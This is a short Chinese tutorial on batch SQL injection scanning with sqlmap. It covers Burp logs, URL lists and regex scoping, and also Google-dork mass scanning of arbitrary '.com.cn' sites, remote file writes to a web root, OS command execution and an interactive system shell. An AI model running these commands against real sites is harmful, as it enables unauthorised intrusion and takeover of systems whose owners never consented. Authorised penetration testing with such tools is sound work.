一.批量化扫描burp的请求日志
1.打开burp配置项,进行如下修改
记录所有的request请求,保存在sqlmap目录下的sql.txt中
2.设置浏览器burp代理,访问测试url,查看sql.txt
3.sqlmap对sql.txt进行扫描
命令:sqlmap.py -l sql.txt --batch -smart
batch:会自动选择yes
smart:启发式快速判断,节约时间
结果将导出到C盘下的sqlmap目录下的output目录
二.批量扫描文本中的多个目标
1.在文本中写入要测试的url
2.sqlmap对url.txt进行扫描
命令:sqlmap.py -m url.txt --dbs
三.利用正则过滤目标网址
因为扫描burp请求时,有很多的请求我们不需要,并不是我们要扫描的网址,因此需要用正则去过滤
参数:–scope
例如:只想要www开头,.com/.net/.org结尾的网址
Python2 sqlmap.py -l burp.log --scope=”(www)?.target.(com|net|org)”
四.利用谷歌批量扫
命令:
sqlmap -g “inurl:php?id=10 site:.com.cn” --proxy “http://127.0.0.1:1080” --threads 5 --batch --answer “extending=N,follow=N,keep=N,exploit=n” --smart
-g #谷歌搜索
-proxy #代理(挂了ss就直接代理本地)
-threads #线程
-batch #自动回复
-answer “extending=N,follow=N,keep=N,exploit=n” #这个可以对一些特定的问题作出回答,在自动化注入中用
-smart #当有大量目标时,这个就只检查基于错误的注入点
例如:首先用谷歌搜索.php?id=1结尾的URL,然后进行注入测试
Sqlmap.py -g “inurl:\”.php?id=1\””
五.关于文件写入与shell获取
sql-shell #执行指定sql命令 (寻找文件绝对路径)
–sql-query #执行指定的sql语句
–file-read #读取指定文件
–file-write #写入本地文件
(–file-write /test/test.txt --file-dest /var/www/html/1.txt;将本地的test.txt文件写入到目标的1.txt)
–file-dest #要写入的文件绝对路径
–os-cmd=id #执行系统命令
–os-shell #系统交互shell
–reg-read #读取win系统注册表
参考链接:
https://cloud.tencent.com/developer/article/1076432